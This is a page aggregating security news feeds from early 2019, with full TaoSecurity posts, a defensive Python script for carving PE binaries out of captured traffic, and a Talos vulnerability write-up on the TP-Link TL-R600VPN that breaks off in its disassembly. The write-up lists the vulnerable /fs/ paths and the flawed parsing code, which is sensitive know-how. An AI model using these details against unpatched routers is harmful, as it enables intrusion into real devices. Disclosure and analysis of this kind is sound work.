Security News from Some Sites I Watch

Threatpost | The first stop for security news The First Stop For Security News

The Hacker News The Hacker News has been internationally recognized as a leading news source dedicated to promoting awareness for security experts and hackers

  • Google fined $57 million by France for lack of transparency and consent
    by noreply@blogger.com (Mohit Kumar) on January 21, 2019 at 6:54 pm

    The French data protection watchdog CNIL has issued its first fine of €50 million (around $57 million) under the European Union’s new General Data Protection Regulation (GDPR) law that came into force in May last year. The fine has been levied on Google for “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization,” the CNIL (National Data […]

  • New malware found using Google Drive as its command-and-control server
    by noreply@blogger.com (Mohit Kumar) on January 21, 2019 at 5:04 pm

    Since most security tools also keep an eye on the network traffic to detect malicious IP addresses, attackers are increasingly adopting infrastructure of legitimate services in their attacks to hide their malicious activities. Cybersecurity researchers have now spotted a new malware attack campaign linked to the notorious DarkHydrus APT group that uses Google Drive as its command-and-control ( […]

  • Alleged Russian Hacker Pleads Not Guilty After Extradition to United States
    by noreply@blogger.com (Wang Wei) on January 21, 2019 at 9:42 am

    A Russian hacker indicted by a United States court for his involvement in online ad fraud schemes that defrauded multiple American companies out of tens of millions of dollars pleaded not guilty on Friday in a courtroom in Brooklyn, New York. Aleksandr Zhukov, 38, was arrested in November last year by Bulgarian authorities after the U.S. issued an international warrant against him, and was […]

  • New Android Malware Apps Use Motion Sensor to Evade Detection
    by noreply@blogger.com (Mohit Kumar) on January 18, 2019 at 11:37 am

    Despite Google’s many efforts to keep malware out of its Play Store, shady apps still manage to slip past its anti-malware protections and reach Android users. Two such Android apps have recently been spotted on the Google Play Store by security researchers with the Trend Micro malware research team, infecting thousands of Android users who hav […]

  • A Twitter Bug Left Android Users’ Private Tweets Exposed For 4 Years
    by noreply@blogger.com (Swati Khandelwal) on January 18, 2019 at 6:49 am

    Twitter just admitted that the social network accidentally revealed some Android users’ protected tweets to the public for more than 4 years — a kind of privacy blunder that you’d typically expect from Facebook. When you sign up for Twitter, all your Tweets are public by default, allowing anyone to view and interact with your Tweets. Fortunately, Twitter also gives you control of your […]

Krebs on Security In-depth security news and investigation

  • 773M Password ‘Megabreach’ is Years Old
    by BrianKrebs on January 17, 2019 at 8:11 pm

    My inbox and Twitter messages positively lit up today with people forwarding stories from Wired and other publications about a supposedly new trove of nearly 773 million unique email addresses and 21 million unique passwords that were posted to a hacking forum. A story in The Guardian breathlessly dubbed it “the largest collection ever of breached data found.” But in an interview with the apparent seller, KrebsOnSecurity learned that it is not even close to the largest gathering of stolen data, and that it is at least two to three years old. […]

  • “Stole $24 Million But Still Can’t Keep a Friend”
    by BrianKrebs on January 16, 2019 at 12:52 am

    Unsettling new claims have emerged about Nicholas Truglia, a 21-year-old Manhattan resident accused of hijacking cell phone accounts to steal tens of millions of dollars in cryptocurrencies from victims. The lurid details, made public in a civil lawsuit filed this week by one of his alleged victims, paint a chilling picture of a man addicted to thievery and all its trappings. The documents suggest that Truglia stole from his father and even a dead man — all the while lamenting that his fabulous new wealth brought him nothing but misery. […]

  • Courts Hand Down Hard Jail Time for DDoS
    by BrianKrebs on January 14, 2019 at 7:37 pm

    Seldom do people responsible for launching crippling cyberattacks face justice, but increasingly courts around the world are making examples of the few who do get busted for such crimes. On Friday, a 34-year-old Connecticut man received a whopping 10-year prison sentence for carrying out distributed denial-of-service (DDoS) attacks against a number of hospitals in 2014. Also last week, a 30-year-old in the United Kingdom was sentenced to 32 months in jail for using an army of hacked devices to crash large portions of Liberia’s Internet access in 2016. […]

  • Secret Service: Theft Rings Turn to Fuze Cards
    by BrianKrebs on January 10, 2019 at 4:27 pm

    Street thieves who specialize in cashing out stolen credit and debit cards increasingly are hedging their chances of getting caught carrying multiple counterfeit cards by relying on Fuze Cards, a smartcard technology that allows users to store dozens of cards on a single device, the U.S. Secret Service warns. […]

  • Patch Tuesday, January 2019 Edition
    by BrianKrebs on January 9, 2019 at 2:46 pm

    Microsoft on Tuesday released updates to fix roughly four dozen security issues with its Windows operating systems and related software. All things considered, this first Patch Tuesday of 2019 is fairly mild, bereft as it is of any new Adobe Flash updates or zero-day exploits. But there are a few spicy bits to keep in mind. Read on for the gory details. […]

BleepingComputer BleepingComputer – All Stories

TaoSecurity Richard Bejtlich’s blog on digital security, strategic thought, and military history.

  • Happy 16th Birthday TaoSecurity Blog
    by noreply@blogger.com (Richard Bejtlich) on January 8, 2019 at 2:03 pm

    Today, 8 January 2019, is TaoSecurity Blog’s 16th birthday! This is also my 3,041st blog post.

    I wrote my first post on 8 January 2003 while working as an incident response consultant for Foundstone.

    Here are a few statistics on the blog. Blogger started providing statistics in May 2010, so these apply to roughly the past 9 years only. As of today, since May 2010 the blog has nearly 9.4 million all-time page views, up from 7.7 million a year ago.

    Here are the most popular posts of the last 9 years, as of today:

    I’m blogging a bit more recently, with 22 posts in 2018 — more than my total for 2016 and 2017 combined, but still not half as much as 2015, which saw 55 posts.

    Twitter continues to play a role in the way I communicate. Last year @taosecurity had nearly 49,000 followers with less than 18,000 Tweets. Today I have nearly 53,000 followers with 19,000 Tweets.

    My rule is generally this: if I start wondering how to fit an idea in 280 characters on Twitter, then a blog post is a better idea. If I start a Twitter “thread,” then I really need to write a blog post!

    I continue to blog about martial arts and related topics at Rejoining the Tao, which incidentally will be three years old later this month, and is currently 11 posts shy of 100. You can see that during my burnout period I shifted my writing and creativity outside of security.

    Thank you to everyone who has been part of this blog’s journey since 2003!

    Copyright 2003-2018 Richard Bejtlich and TaoSecurity (taosecurity.blogspot.com and www.taosecurity.com) […]

  • Notes on Self-Publishing a Book
    by noreply@blogger.com (Richard Bejtlich) on January 7, 2019 at 3:17 pm

    In this post I would like to share a few thoughts on self-publishing a book, in case anyone is considering that option.

    As I mentioned in my post on burnout, one of my goals was to publish a book on a subject other than cyber security. A friend from my Krav Maga school, Anna Wonsley, learned that I had published several books, and asked if we might collaborate on a book about stretching. The timing was right, so I agreed.

    I published my first book with Pearson and Addison-Wesley in 2004, and my last with No Starch in 2013. 14 years is an eternity in the publishing world, and even in the last 5 years the economics and structure of book publishing have changed quite a bit.

    To better understand the changes, I had dinner with one of the finest technical authors around, Michael W. Lucas. We met prior to my interest in this book, because I had wondered about publishing books on my own. MWL started in traditional publishing like me, but has since become a full-time author and independent publisher. He explained the pros and cons of going it alone, which I carefully considered.

    By the end of 2017, Anna and I were ready to begin work on the book. I believe our first “commits” occurred in December 2017.

    For this stretching book project, I knew my strengths included organization, project management, writing to express another person’s message, editing, and access to a skilled lead photographer. I learned that my co-author’s strengths included subject matter expertise, a willingness to be photographed for the book’s many pictures, and friends who would also be willing to be photographed.

    None of us was very familiar with the process of transforming a raw manuscript and photos into a finished product. When I had published with Pearson and No Starch, they took care of that process, as well as copy-editing.

    Beyond turning manuscript and photos into a book, I also had to identify a publication platform. Early on we decided to self-publish using one of the many newer companies offering that service. We wanted a company that could get our book into Amazon, and possibly physical book stores as well. We did not want to try working with a traditional publisher, as we felt that we could manage most aspects of the publishing process ourselves, and augment with specialized help where needed.

    After a lot of research we chose Blurb. One of the most attractive aspects of Blurb was their expert ecosystem. We decided that we would hire one of these experts to handle the interior layout process. We contacted Jennifer Linney, who happened to be local and had experience publishing books to Amazon. We met in person, discussed the project, and agreed to move forward together.

    I designed the structure of the book. As a former Air Force officer, I was comfortable with the “rule of threes,” and brought some recent writing experience from my abandoned PhD thesis.

    I designed the book to have an introduction, the main content, and a conclusion. Within the main content, the book featured an introduction and physical assessment, three main sections, and a conclusion. The three main sections consisted of a fundamental stretching routine, an advanced stretching routine, and a performance enhancement section — something with Indian clubs, or kettle bells, or another supplement to stretching.

    Anna designed all of the stretching routines and provided the vast majority of the content. She decided to focus on three physical problem areas — tight hips, shoulders/back, and hamstrings. We encouraged the reader to “reach three goals” — open your hips, expand your shoulders, and touch your toes. Anna designed exercises that worked in a progression through the body, incorporating her expertise as a certified trainer and professional martial arts instructor.

    Initially we tried a process whereby she would write section drafts, and I would edit them, all using Google Docs. This did not work as well as we had hoped, and we spent a lot of time stalled in virtual collaboration.

    By the spring of 2018 we decided to try meeting in person on a regular basis. Anna would explain her desired content for a section, and we would take draft photographs using iPhones to serve as placeholders and to test the feasibility of real content. We made a lot more progress using these methods, although we stalled again mid-year due to schedule conflicts.

    By October our text was ready enough to try taking book-ready photographs. We bought photography lights from Amazon and used my renovated basement game room as a studio. We took pictures over three sessions, with Anna and her friend Josh as subjects. I spent several days editing the photos to prepare for publication, then handed the bundled manuscript and photographs to Jennifer for a light copy-edit and layout during November.

    Our goal was to have the book published before the end of the year, and we met that goal. We decided to offer two versions. The first is a “collector’s edition” featuring all color photographs, available exclusively via Blurb as Reach Your Goal: Collector’s Edition. The second will be available at Amazon in January, and will feature black and white photographs.

    While we were able to set the price of the book directly via Blurb, we could basically only suggest a price to Ingram and hence to Amazon. Ingram is the distributor that feeds Amazon and physical book stores. I am curious to see how the book will appear in those retail locations, and how much it will cost readers. We tried to price it competitively with older stretching books of similar size. (Ours is 176 pages with over 200 photographs.)

    Without revealing too much of the economic structure, I can say that it’s much cheaper to sell directly from Blurb. Their cost structure allows us to price the full color edition competitively. However, one of our goals was to provide our book through Amazon, and to keep the price reasonable we had to sell the black and white edition outside of Blurb.

    Overall I am very pleased with the writing process, and exceptionally happy with the book itself. The color edition is gorgeous and the black and white version is awesome too.

    The only change I would have made to the writing process would have been to start the in-person collaboration from the beginning. Working together in person accelerated the transfer of ideas to paper and played to our individual strengths of Anna as subject matter expert and me as a writer.

    In general, I would not recommend self-publishing if you are not a strong writer. If writing is not your forte, then I highly suggest you work with a traditional publisher, or contract with an editor. I have seen too many self-published books that read terribly. This usually happens when the author is a subject matter expert, but has trouble expressing ideas in written form.

    The bottom line is that it’s never been easier to make your dream of writing a book come true. There are options for everyone, and you can leverage them to create wonderful products that scale with demand and can really help your audience reach their goals!

    If you want to start the new year with better flexibility and fitness, consider taking a look at our book on Blurb! When the Amazon edition is available I will update this post with a link.

    Update: Here is the Amazon listing.

    Cross-posted from Rejoining the Tao Blog. […]

  • Managing Burnout
    by noreply@blogger.com (Richard Bejtlich) on December 21, 2018 at 9:30 pm

    This is not strictly an information security post, but the topic likely affects a decent proportion of my readership.

    Within the last few years I experienced a profound professional “burnout.” I’ve privately mentioned this to colleagues in the industry, and heard similar stories or requests for advice on how to handle burnout.

    I want to share my story in the hopes that it helps others in the security scene, either by coping with existing burnout or preparing for a possible burnout.

    How did burnout manifest for me? It began with FireEye’s acquisition of Mandiant, almost exactly five years ago. 2013 was a big year for Mandiant, starting with the APT1 report in early 2013 and concluding with the acquisition in December.

    The prospect of becoming part of a Silicon Valley software company initially seemed exciting, because we would presumably have greater resources to battle intruders. Soon, however, I found myself at odds with FireEye’s culture and managerial habits, and I wondered what I was doing inside such a different company.

    (It’s important to note that the appointment of Kevin Mandia as CEO in June 2016 began a cultural and managerial shift. I give Kevin and his lieutenants credit for helping transform the company since then. Kevin’s appointment was too late for me, but I applaud the work he has done over the last few years.)

    Starting in late 2014 and progressing in 2015, I became less interested in security. I was aggravated every time I saw the same old topics arise in social or public media. I did not see the point of continuing to debate issues which were never solved. I was demoralized and frustrated.

    At this time I was also working on my PhD with King’s College London. I had added this stress myself, but I felt like I could manage it. I had earned two major and two minor degrees in four years as an Air Force Academy cadet. Surely I could write a thesis!

    Late in 2015 I realized that I needed to balance the very cerebral art of information security with a more physical activity. I took a Krav Maga class the first week of January 2016. It was invigorating and I began a new blog, Rejoining the Tao, that month. I began to consider options outside of information security.

    In early 2016 my wife began considering ways to rejoin the W-2 workforce, after having stayed home with our kids for 12 years. We discussed the possibility of me leaving my W-2 job and taking a primary role with the kids. By mid-2016 she had a new job and I was open to departing FireEye.

    By late 2016 I also realized that I was not cut out to be a PhD candidate. Although I had written several books, I did not have the right mindset or attitude to continue writing my thesis. After two years I quit my PhD program. This was the first time I had quit anything significant in my life, and it was the right decision for me. (The Churchill “never, never, never give up” speech is fine advice when defending your nation’s existence, but it’s stupid advice if you’re not happy with the path you’re following.)

    In March 2017 I posted Bejtlich Moves On, where I said I was leaving FireEye. I would offer security consulting in the short term, and would open a Krav Maga school in the long-term. This was my break with the security community and I was happy to make it. I blogged on security only five more times in 2017.

    (Incidentally, one very public metric for my burnout experience can be seen in my blog output. In 2015 I posted 55 articles, but in 2016 I posted only 8, and slightly more, 12, in 2017. This is my 21st post of 2018.)

    I basically took a year off from information security. I did some limited consulting, but Mrs B paid the bills, with some support from my book royalties and consulting. This break had a very positive effect on my mental health. I stayed aware of security developments through Twitter, but I refused to speak to reporters and did not entertain job offers.

    During this period I decided that I did not want to open a Krav Maga school and quit my school’s instructor development program. For the second time, I had quit something I had once considered very important.

    I started a new project, though — writing a book that had nothing to do with information security. I will post about it shortly, as I am finalizing the cover with the layout team this weekend!

    By the spring of 2018 I was able to consider returning to security. In May I blogged that I was joining Splunk, but that lasted only two months. I realized I had walked into another cultural and managerial mismatch. Near the end of that period, Seth Hall from Corelight contacted me, and by July 20th I was working there. We kept it quiet until September. I have been very happy at Corelight, finally finding an environment that matches my temperament, values, and interests.

    My advice to those of you who have made it this far:

    If you’re feeling burnout now, you’re not alone. It happens. We work in a stressful industry that will take everything that you can give, and then try to take more. It’s healthy and beneficial to push back. If you can, take a break, even if it means only a partial break.

    Even if you can’t take a break, consider integrating non-security activities into your lifestyle — the more physical, the better. Security is a very cerebral activity, often performed in a sedentary manner. You have a body and taking care of it will make your mind happier too.

    If you’re not feeling burnout now, I recommend preparing for a possible burnout in the future. In addition to the advice in the previous paragraphs, take steps now to be able to completely step away from security for a defined period. Save a proportion of your income to pay your bills when you’re not working in security. I recommend at least a month, but up to six months if you can manage it.

    This is good financial advice anyway, in the event you were to lose your job. This is not an emergency fund, though — this is a planned reprieve from burnout. We are blessed in security to make above-average salaries, so I suggest saving for retirement, saving for layoffs, and saving for burnout.

    Finally, it’s ok to talk to other people about this. This will likely be a private conversation. I don’t see too many people saying “I’m burned out!” on Twitter or in a blog post. I only felt comfortable writing this post months after I returned to regular security work.

    I’m very interested in hearing what others have to say on this topic. Replying to my Twitter announcement for the blog post is probably the easiest step. I moderate the comments here and might not get to them in a timely manner. […]

  • The Origin of the Quote “There Are Two Types of Companies”
    by noreply@blogger.com (Richard Bejtlich) on December 18, 2018 at 4:22 pm

    While listening to a webcast this morning, I heard the speaker mention

        There are two types of companies: those who have been hacked, and those who don’t yet know they have been hacked.

    He credited Cisco CEO John Chambers but didn’t provide any source.

    That didn’t sound right to me. I could think of two possible antecedents, so I did some research. I confirmed my memory and would like to present what I found here.

    John Chambers did indeed offer the previous quote, in a January 2015 post for the World Economic Forum titled What does the Internet of Everything mean for security? Unfortunately, neither Mr Chambers nor the person who likely wrote the article for him decided to credit the author of this quote.

    Before providing proper credit for this quote, we need to decide what the quote actually says. As noted in this October 2015 article by Frank Johnson titled Are there really only “two kinds of enterprises”?, there are really (at least) two versions of this quote:

        A popular meme in the information security industry is, “There are only two types of companies: those that know they’ve been compromised, and those that don’t know.”

        And the second is like unto it: “There are only two kinds of companies: those that have been hacked, and those that will be.”

    We see that the first is a version of what Mr Chambers said. Let’s call that 2-KNOW. The second is different. Let’s call that 2-BE.

    The first version, 2-KNOW, can be easily traced and credited to Dmitri Alperovitch. He stated this proposition as part of the publicity around his Shady RAT report, written while he worked at McAfee. For example, this 3 August 2011 story by Ars Technica, Operation Shady RAT: five-year hack attack hit 14 countries, quotes Dmitri in the following:

        So widespread are the attacks that Dmitri Alperovitch, McAfee Vice President of Threat Research, said that the only companies not at risk are those who have nothing worth taking, and that of the world’s biggest firms, there are just two kinds: those that know they’ve been compromised, and those that still haven’t realized they’ve been compromised.

    Dmitri used slightly different language in this popular Vanity Fair article from September 2011, titled Enter the Cyber-Dragon:

        Dmitri Alperovitch, who discovered Operation Shady rat, draws a stark lesson: “There are only two types of companies—those that know they’ve been compromised, and those that don’t know. If you have anything that may be valuable to a competitor, you will be targeted, and almost certainly compromised.”

    No doubt former FBI Director Mueller read this report (and probably spoke with Dmitri). He delivered a speech at RSA on 1 March 2012 that introduced version 2-BE into the lexicon, plus a little more:

        For it is no longer a question of “if,” but “when” and “how often.”

        I am convinced that there are only two types of companies: those that have been hacked and those that will be. And even they are converging into one category: companies that have been hacked and will be hacked again.

    Here we see Mr Mueller morphing Dmitri’s quote, 2-KNOW, into the second, 2-BE. He also introduced a third variant — “companies that have been hacked and will be hacked again.” Let’s call this version 2-AGAIN.

    The very beginning of Mr Mueller’s quote is surely a play on Kevin Mandia’s long-term commitment to the inevitability of compromise. However, as far as I could find, Kevin did not use the “two companies” language.

    One article that mentions version 2-KNOW and Kevin is this December 2014 Ars Technica article titled “Unprecedented” cyberattack no excuse for Sony breach, pros say. However, the article is merely citing other statements by Kevin along with the aphorism of version 2-KNOW.

    Finally, there’s a fourth version introduced by Mr Mueller’s successor, James Comey, as well! In a 6 October 2014 story, FBI Director: China Has Hacked Every Big US Company, Mr Comey said:

        Speaking to CBS’ 60 Minutes, James Comey had the following to say on Chinese hackers: There are two kinds of big companies in the United States. There are those who’ve been hacked by the Chinese and those who don’t know they’ve been hacked by the Chinese.

    Let’s call this last variant 2-CHINA.

    To summarize, there are four versions of the “two companies” quote:

      • 2-KNOW, credited to Dmitri Alperovitch in 2011, says “There are only two types of companies—those that know they’ve been compromised, and those that don’t know.”
      • 2-BE, credited to Robert Mueller in 2012, says “[T]here are only two types of companies: those that have been hacked and those that will be.”
      • 2-AGAIN, credited to Robert Mueller in 2012, says “[There are only two types of companies:] companies that have been hacked and will be hacked again.”
      • 2-CHINA, credited to James Comey in 2014, says “There are two kinds of big companies in the United States. There are those who’ve been hacked by the Chinese and those who don’t know they’ve been hacked by the Chinese.”

    Now you know! […]

  • On “Advanced” Network Security Monitoring
    by noreply@blogger.com (Richard Bejtlich) on December 14, 2018 at 3:16 pm

    My TaoSecurity News page says I taught 41 classes lasting a day or more, from 2002 to 2014. All of these involved some aspect of network security monitoring (NSM). Many times students would ask me when I would create the “advanced” version of the class, usually in the course feedback. I could never answer them, so I decided to do so in this blog post.

    The short answer is this: at some point, advanced NSM is no longer NSM. If you consider my collection – analysis – escalation – response model, NSM extensions from any of those phases quickly have little or nothing to do with the network.

    Here are a few questions I have received concerning “advanced NSM,” paired with the answers I could have provided.

    Q: “I used NSM to extract a binary from network traffic. What do I do with this binary?”
    A: “Learn about reverse engineering and binary analysis.”

    Q: “I used NSM to extract Javascript from a malicious Web page. What do I do with this Javascript?”
    A: “Learn about Javascript de-obfuscation and programming.”

    Q: “I used NSM to capture an exchange between a Windows client and a server. What does it mean?”
    A: “Learn about Server Message Block (SMB) or Common Internet File System (CIFS).”

    Q: “I used NSM to capture cryptographic material exchanged between a client and a server. How do I understand it?”
    A: “Learn about cryptography.”

    Q: “I used NSM to grab shell code passed with an exploit against an Internet-exposed service. How do I tell what it does?”
    A: “Learn about programming in assembly.”

    Q: “I want to design custom hardware for packet capture. How do I do that?”
    A: “Learn about programming ASICs (application specific integrated circuits).”

    I realized that I had the components of all of this “advanced NSM” material in my library. I had books on reverse engineering and binary analysis, Javascript, SMB/CIFS, cryptography, assembly programming, ASICs, etc.

    The point is that eventually the NSM road takes you to other aspects of the cyber security landscape.

    Are there *any* advanced areas for NSM? One could argue that protocol analysis, as one finds in tools like Bro, Suricata, Snort, Wireshark, and so on, constitutes advanced NSM. However, you could just as easily argue that protocol analysis becomes more about understanding the programming and standards behind each of the protocols.

    In brief, to learn advanced NSM, expand beyond NSM. […]
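    The first question in the post, a binary pulled out of network traffic, is the point where NSM hands off to binary analysis, and the hand-off has a concrete first step. The script below is an added example, not code from Bejtlich’s post or from any of the tools he names: it carves a PE image out of a reassembled stream, records its SHA-256, and reads the COFF header and section table so the analyst knows the architecture, entry point and section layout before opening a disassembler. The stream it runs on is constructed inside the script (a minimal PE32+ with two sections behind an HTTP response); it is not a real binary and does nothing if executed.

```python
import hashlib
import struct
from datetime import datetime, timezone

PE_SIG = b"PE\0\0"
MACHINES = {0x014C: "x86", 0x8664: "x64", 0x01C0: "ARM", 0xAA64: "ARM64"}
COFF_FMT = "<HHIIIHH"         # Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSyms, SizeOfOptHdr, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"  # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, relocs/lines, Characteristics


def parse_pe(blob: bytes) -> dict:
    """Read DOS header, COFF header, optional-header magic/entry point and the section table.

    image_size is the end of the last section's raw data, which is the natural carve
    boundary when the binary sits inside a larger stream.
    """
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if not 0x40 <= e_lfanew <= len(blob) - 24 or blob[e_lfanew:e_lfanew + 4] != PE_SIG:
        raise ValueError("bad e_lfanew or missing PE signature")
    coff = e_lfanew + 4
    machine, nsec, timestamp, _, _, opt_size, characteristics = struct.unpack_from(COFF_FMT, blob, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", blob, opt)[0]
    entry_rva = struct.unpack_from("<I", blob, opt + 16)[0]  # AddressOfEntryPoint sits at +16 in PE32 and PE32+
    sec_table = opt + opt_size
    if sec_table + 40 * nsec > len(blob):
        raise ValueError("section table truncated")
    sections, image_size, entry_section = [], sec_table + 40 * nsec, None
    for k in range(nsec):
        name, vsize, vaddr, rsize, rptr, _, _, _, _, flags = struct.unpack_from(SECTION_FMT, blob, sec_table + 40 * k)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        sections.append(name)
        image_size = max(image_size, rptr + rsize)
        if vaddr <= entry_rva < vaddr + max(vsize, rsize):
            entry_section = name  # entry point outside any section is itself a triage flag
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "bits": {0x10B: 32, 0x20B: 64}.get(magic),
        "dll": bool(characteristics & 0x2000),
        "timestamp": datetime.fromtimestamp(timestamp, timezone.utc).isoformat(),
        "entry_rva": entry_rva,
        "entry_section": entry_section,
        "sections": sections,
        "image_size": image_size,
    }


def carve_pe(payload: bytes):
    """Return (offset, image bytes) of the first parseable PE in a reassembled stream, or None."""
    start = 0
    while (i := payload.find(b"MZ", start)) >= 0:
        try:
            info = parse_pe(payload[i:])
            return i, payload[i:i + info["image_size"]]
        except (ValueError, struct.error, OverflowError, OSError):
            start = i + 1  # "MZ" appears in ordinary data too; keep scanning
    return None


def triage(payload: bytes):
    """Carve, hash and summarise: the first thing to do with a binary pulled out of traffic."""
    found = carve_pe(payload)
    if found is None:
        return None
    offset, image = found
    info = parse_pe(image)
    info.update(offset=offset, sha256=hashlib.sha256(image).hexdigest())
    return info


# Constructed sample (assumption, not a binary from any report): a minimal PE32+ with two
# sections, behind an HTTP response the way a dropper download looks in a reassembled stream.
SAMPLE_HTTP_PREFIX = b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"


def build_sample_pe() -> bytes:
    opt_size, nsec = 0xF0, 2                                   # PE32+ optional header is 0xF0 bytes
    text, data = b"\xCC" * 0x100, b"constructed-sample\0"      # int3 filler, no real code
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)      # e_lfanew -> 0x40
    coff = struct.pack(COFF_FMT, 0x8664, nsec, 0x5C3FA0B0, 0, 0, opt_size, 0x0022)
    opt = struct.pack("<H", 0x20B) + b"\0" * 14 + struct.pack("<I", 0x1000) + b"\0" * (opt_size - 20)
    sec = struct.pack(SECTION_FMT, b".text", len(text), 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    sec += struct.pack(SECTION_FMT, b".data", len(data), 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    headers = dos + PE_SIG + coff + opt + sec
    return headers.ljust(0x200, b"\0") + text.ljust(0x200, b"\0") + data.ljust(0x200, b"\0")


def build_sample_stream() -> bytes:
    return SAMPLE_HTTP_PREFIX + build_sample_pe() + b"<trailing stream bytes>"


if __name__ == "__main__":
    for key, value in triage(build_sample_stream()).items():
        print(f"{key:14} {value}")
```

    The hash is what goes into the ticket and the sandbox lookup; the header facts decide which toolchain comes next (32- vs 64-bit, DLL vs EXE, which section holds the entry point). Real carving also has to cope with chunked or compressed HTTP bodies and with images whose raw sizes lie, which this example does not attempt.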

Naked Security Computer Security News, Advice and Research

WeLiveSecurity News, views, and insight from the ESET security community

Talos Blog Talos Group, by Cisco

  • Threat Roundup for Jan. 11 to Jan. 18
    by noreply@blogger.com (William Largent) on January 18, 2019 at 11:15 pm

    Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Jan. 11 and Jan. 18. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.The most prevalent threats highlighted in this roundup are:Win.Malware.Emotet-6816461-0 Malware Emotet is a banking trojan that remains relevant due to its ability to evolve and bypass antivirus products. It is commonly spread via malicious email attachments and links. Doc.Malware.Powload-6815340-0 Malware Powload is a malicious document that uses PowerShell to download malware. This campaign is currently distributing the Emotet malware. Win.Downloader.Upatre-6815606-0 Downloader Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware. 
Doc.Malware.Sagent-6813871-0 Malware Sagent launches PowerShell through macros in Microsoft Office documents. The PowerShell then downloads unwanted software from remote websites.  Win.Virus.Sality-6814419-0 Virus Sality is a file infector that establishes a peer-to-peer botnet. Although it’s been prevalent for more than a decade, we continue to see new samples that require marginal attention in order to remain consistent with detection. Once a Sality client bypasses perimeter security, its goal is to execute a downloader component capable of executing additional malware. Win.Packed.Johnnie-6814043-0 Packed Johnnie, also known as Mikey, is a malware family that focuses on persistence and is known for its plugin architecture. Win.Downloader.Powershell-6810733-0 Downloader This cluster came with spam emails containing zipped JavaScript attachments. Once the user runs the file, these malicious JavaScript attachments use PowerShell and BITSAdmin to download and install the Gandcrab ransomware. 

  • Cisco Talos’ new reputation dispute system
    by noreply@blogger.com (Jonathan Munshaw) on January 18, 2019 at 6:24 pm

    We know users have been waiting for this feature for a while, and we are here to say: It’s ready. Cisco Talos’ new reputation system rolled out Jan. 14 on TalosIntelligence.com. We have been working on this change since the rollout was initially announced this past summer.

    Starting today, all users who wish to file a reputation dispute with us will need to log in with a free Cisco Connection Online ID (CCID) and head to the Talos Reputation Center. There, users can look up the reputation of any IP or domain to see all current information Talos has on that entry. Sites that customers feel are miscategorized can also be disputed on this page. This page also shows who the highest-volume senders are and lets users sort that data by network owner and country.

    Additionally, users who believe their site has been inappropriately blacklisted can file a dispute, which will flow through the appropriate channels to address their concerns.

    The new system closely links the dispute ticketing system and our analysts to create greater interactivity between analysts and customers. Users simply log into TalosIntelligence.com with their CCID to see the resolution of any dispute they’ve ever filed through this new system.

    Our new reputation dispute system merges several sites, including Talosintelligence.com, securityhub.cisco.com and senderbase.org. We hope this new setup provides an easier, streamlined process for our customers and users to file and track disputes with us. Check out the new Reputation and Categorization Support page now! […]

  • Vulnerability Deep Dive: TP-Link TL-R600VPN remote code execution vulnerabilities
    by noreply@blogger.com (William Largent) on January 18, 2019 at 4:33 pm

    Vulnerability discovery and research by Jared Rittle and Carl Hurd of Cisco Talos.

    Introduction

    TP-Link recently patched three vulnerabilities in their TL-R600VPN gigabit broadband VPN router, firmware version 1.3.0. Cisco Talos publicly disclosed these issues after working with TP-Link to ensure that a patch was available. Now that a fix is out there, we want to take the time to dive into the inner workings of these vulnerabilities and show the approach we took with our proof-of-concept code.

    Background

    The TP-Link TL-R600VPN is a five-port small office/home office (SOHO) router. This device contains a Realtek RTL8198 integrated system on a chip. This particular chip uses an offshoot of the MIPS-1 architecture developed by Lexra. Except for a few proprietary instructions for handling unaligned load and store operations, these two instruction sets are essentially the same. The instructions that are not included in Lexra are LWL, SWL, LWR, and SWR. These proprietary instructions are often emitted when compiling a program for the more common MIPS-1 architecture and cause a segfault when encountered on Lexra.
    Knowledge of this key difference is imperative to assembling working code for the target. For more information about Lexra MIPS and its differences from the MIPS-1 architecture, refer to ‘The Lexra Story’ and the MIPS-1 patent filing.

    Recon

    Understanding the vulnerability

    The device contains a vulnerability in the way that the HTTP server handles requests to the /fs/ directory, allowing an authenticated attacker to remotely execute code on the device. When accessing any of the following pages in the /fs/ directory, the application incorrectly parses the passed HTTP header.

        http://<router_ip>/fs/help
        http://<router_ip>/fs/images
        http://<router_ip>/fs/frames
        http://<router_ip>/fs/dynaform
        http://<router_ip>/fs/localiztion (NOTE: this is not a typo)

    In the function ‘httpGetMimeTypeByFileName’, the web server attempts to parse the file extension of the requested page to determine its mime type. During this processing, the server uses a strlen() call to determine the length of the requested page name, seeks to the end of that heap-allocated string, and reads the file extension backwards until it encounters a period (0x2e).

        #
        # calculates the length of the uri and seeks to the end
        #
        LOAD:00425CDC loc_425CDC:
        LOAD:00425CDC                 la $t9, strlen
        LOAD:00425CE0                 sw $zero, 0x38+var_20($sp)
        LOAD:00425CE4                 jalr $t9 ; strlen
        LOAD:00425CE8                 sh $zero, 0x38+var_1C($sp)
        LOAD:00425CEC                 addu $s0, $v0
        # looks for a period at the current index and break out when found
        LOAD:00425CF0                 li $v0, 0x2E
        LOAD:00425CF4                 lbu $v1, 0($s0)
        LOAD:00425CF8                 lw $gp, 0x38+var_28($sp)
